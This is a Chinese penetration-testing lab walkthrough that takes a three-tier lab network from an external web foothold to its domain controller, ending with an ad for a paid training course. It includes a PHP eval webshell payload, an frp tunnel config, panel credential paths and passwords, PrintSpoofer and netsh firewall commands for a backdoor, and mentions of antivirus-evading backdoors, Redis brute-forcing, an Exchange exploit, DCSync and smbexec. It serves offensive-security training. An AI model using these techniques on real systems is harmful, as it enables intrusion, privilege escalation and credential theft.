【项目十一】从外网打点到内网域实战cncat

暗月实战项目十一

从外网打点到内网域实战cncat

moonsec

1.概述1

2.靶场搭建2

3.外网打点5

3.1.SQLMAP注入得到账号和密码5

3.2.修改配置文件拿webshell6

3.3.提权宝塔系统6

3.4.frp反向代理突破登录9

4.内网渗透10

4.1.主机信息收集11

4.2.横向渗透11

4.3.跨网段扫描12

4.4.hydra爆破redis12

4.5.rediswindows写shell12

4.6.answrod连接shell13

4.7.信息收集redis服务器信息14

4.8.PrintSpoofer提权server

4.9.下载metasploist正向后门收集信息15

4.10.设置服务方式启动后门15

4.11.设置windwos防火墙开放8899端口15

4.12.metasploit正向连接后门16

4.13.outlook查看邮件18

5.跨网段内网渗透18

5.1.CVE-2020-0688攻击exchange20

5.2.获取dc下的root21

5.3.通过smbexec登录域控22

概述

1

暗月实战项目十一是从外网打点到内网再到域控，是三层网络，目标是反向代理到内网访问，通过这个WEB点的信息获取源码，再到审计突破，再到内网。到了内网通过横向移动发现更多主机，通过信息整理得到工作组边界设备的权限，再通过exchange漏洞获取核心区域访问权限，再拿下域控权限。

主要技术应用：

基础的php代码审计、win系统的宝塔系统提权、cs或者msf实战渗透环境（vps一台）、shellcode免杀过火绒、内网漫游、三层网络、redis windows写shell

windwos防火墙配置（主要是会开端口和端口转发）、代理隧道应用，exchange漏洞命令执行，打域控技巧。

靶场搭建

2

12server-bt和12server-redis是nat模式。

外网准备一台vps系统可以是win也可以是linux要装有frp服务

在12server-bt配置frp

[common]

server_addr=你的vpsIP

server_port= 7788

token=moonsec9999

[web]

type= tcp

local_ip= 127.0.0.1

local_port= 80

remote_port= 80

绑定hosts

C:\Windows\System32\drivers\etc\hosts

外网打点

3

3.1 SQLMAP注入得到账号和密码

破解得moon@123

3.2 修改配置文件拿webshell

moo);eval($_POST[cmd]);//

3.3 提权宝塔系统

禁用函数

查看配置文件获取密码

宝塔的登录密码C:/BtSoft/panel/data/default.pl jSKyFFdj

宝塔的登录端口C:/BtSoft/panel/data/port.pl8888

宝塔的登录网址路径C:/BtSoft/panel/data/admin_path.pl/e1VOsmtO

C:/BtSoft/panel/data/default.db

sqlite数据库打开即可

账号gOXZQjWA密码jSKyFFdj登录:8888/e1VOsmtO

扫描端口

只开放了22和80端口

查看本地开放端口

访问8888端口

能访问登录页面但是登录不了。

3.4 frp反向代理突破登录

当前站点是反向代理出去的，所以可以考虑能不能修改配置文件。

可以看到文件是能修改，所以当管理重新执行的时候，就能通过8888端口访问宝塔的系统的8888端口。

登录宝塔系统

这个后门还要过火绒的。随便找了以前那些资源生成了一个后门。然后在宝塔任务执行。

内网渗透

4

4.1主机信息收集

4.2 横向渗透

4.3 跨网段扫描

在session执行绑定静态路由

修改配置文件vi/etc/proxychains.conf

添加socks4 127.0.0.1 1080

代理nmap扫描

4.4 hydra爆破redis

4.5 redis windows写shell

访问shell

4.6 answrod连接shell

修改proxychanis.conf连接

4.7 信息收集redis服务器信息

发现存在两个段

当前权限也是很低

4.8 PrintSpoofer提权server2012

把PrintSpoofer上传到C:\ProgramData\

C:\ProgramData\moonsec.exe-i -c "whoami"

4.9 下载metasploist正向后门收集信息

因为reids主机是出不了网的所以要将后门放在宝塔上的80端口，同样也要过火绒。

4.10 设置服务方式启动后门

注意双引号转义

启动后门

moonsec.exe -i -c"net start\"server power\""

4.11 设置windwos防火墙开放8899端口

因为有防火墙拦截先添加一个8899端口

netshfirewall add portopening tcp 8899 msf

4.12 metasploit正向连接后门

启动后门

这里有一个bug连上之后个几分钟就自动退出了。所以连接后马上迁移进程防止失去连接。

扫描10段的主机发现存在201和209

4.13 outlook查看邮件

导出outlook文件C:\Users\Administrator\Documents\Outlook文件

跨网段内网渗透

5

添加路由

访问443端口是一个exchange

登录成功。

查看所有用户。

5.1 CVE-2020-0688 攻击exchange

下载后门文件到exchange

5.2 获取dc下的root

dcsync administrator获取hash

知道了密码就可以通过代理对域控进行命令执行了。这里有空再说了。

5.3 通过smbexec登录域控

培训

6

项目十一 cncat

已经录制好课程有配套的工具

欢迎加入暗月全栈渗透培训观看和学习

培训咨询

扫一扫添加好友

公众号